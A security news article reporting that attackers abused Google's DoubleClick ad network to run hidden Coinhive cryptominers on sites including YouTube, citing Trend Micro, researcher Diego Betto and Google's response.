Select Page

Google’s Ad Network exploited to serve browser crypto miners

Google’s Ad Network exploited to serve browser crypto miners

Hackers have been actively exploiting Google’s ad network to deliver silent cryptominers on high-traffic sites.

Trend Micro researchers detected an almost 285% increase in the number of Coinhive miners on January 24 and started seeing an increase in traffic to five malicious domains on January 18, according to a Jan. 26 blog post.

Researchers spotted two different web miner scripts embedded in the pages along with a script that displays the advertisement from DoubleClick. Victims will see a legitimate advertisement while two silent cryptominers run in the background.

“We speculate that the attackers’ use of these advertisements on legitimate websites is a ploy to target a larger number of users, in comparison to only that of compromised devices,” researchers said in the post.

The advertisement contains a JavaScript code that generates a random number between 1 and 101 and if the generated number is above 10, the script will call out coinhive.min.js to mine 80% of the CPU power, which is what happens nine out of ten times, researchers added.

TrendMicro researchers weren’t the only ones to spot the problem. Independent researcher Diego Betto spotted YouTube serving ads laced with CPU-draining Coinive Monero cyrptominers late last week.

During normal browsing on YouTube, at some point, the antivirus Avast reported something that was not good.” Betto said in a Jan 25 blog post. From the Chrome Inspector it appears that one of the ads is infected and tries to load a crypto miner from Coinhive.”

Betto wasn’t the only one to notice the silent cryptominers as others voiced their frustration across Twitter and other social media channels.

In addition to the attackers stealing CPU cycles, the malicious JavaScript in some cases was also accompanied by graphics that displayed ads for fake AV programs that scam people out of money and often contain malware.The researchers reported everything to Google.

“Mining cryptocurrency through ads is a relatively new form of abuse that violates our policies  and one that we’ve been monitoring actively,” a Google spokesperson told SC Media. “We enforce our policies through a multi-layered detection system across our platforms which we update as new threats emerge. In this case, the ads were blocked in less than two hours and the malicious actors were quickly removed from our platforms.”

Image credit: ptoone | Dreamstime

About The Author

Sam Reed

InfoSec researcher and Security awareness advocate. Tech-writer with marketing, social media background.

Leave a reply

Your email address will not be published. Required fields are marked *

Human Verification: In order to verify that you are a human and not a spam bot, please enter the answer into the following box below based on the instructions contained in the graphic.